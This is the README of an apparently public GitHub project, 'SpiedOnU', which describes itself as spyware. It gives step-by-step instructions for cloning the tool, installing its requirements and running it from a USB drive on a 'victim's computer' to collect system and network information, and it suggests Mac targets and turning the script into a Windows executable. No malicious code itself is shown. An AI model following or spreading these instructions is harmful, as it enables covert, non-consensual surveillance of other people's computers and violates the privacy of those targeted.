DUE TO LEGAL REASONS I HAVE CLOSE-SOURCED MY CODE AND ANY PUBLIC CODE USED OF THIS REPOSITORY IS NOW IN THE RESPONSIBILITY OF THAT REPOSITORY'S OWNER
👁️ SpiedOnU 👁️
📋 Introduction 📋
This is a piece of spyware made to log hardware data (and sometimes network data) of computer devices
- Download the file from github or with the
git clone
command. - Install the items in requirements:
pip install -r requirements.txt
- Run in victim's computer with:
python3 main.py
- Use a USB/Flash Drive to run the Program. This way, once the program is finished, you can just eject the USB/Flash Drive and have all the system's data!
- Perform this on a Mac System if possible.
Though you can run this program on ANY system, most information that can be gathered is from Mac Operating Systems
(Due to their use of specific commands)
- Program runs non-sudo/administrative commands automatically in the terminal/cmd-line
- Outputs of these commands are sent into multiple different files (To the file with the OS's name)
- Done! Now you have files of their entire system's information!
📥 How to Install 📥
1a. You can install by downloading the zip file
OR
1b. Download with the command:
git clone https://github.com/Lin8x/spied-on-u
2. Download requirements with the command:
pip install -r requirements.txt
🔓 System Requirements 🔓
This is a list of requirements needed to run/edit the program
(This can easily be prevented for windows systems with formatting the python file into a .exe file)
+ Python3
+ Any Operating System:
- Windows System
- Mac OS X
- Linux (Ubuntu/Debian Based)
+ Items in the requirements.txt file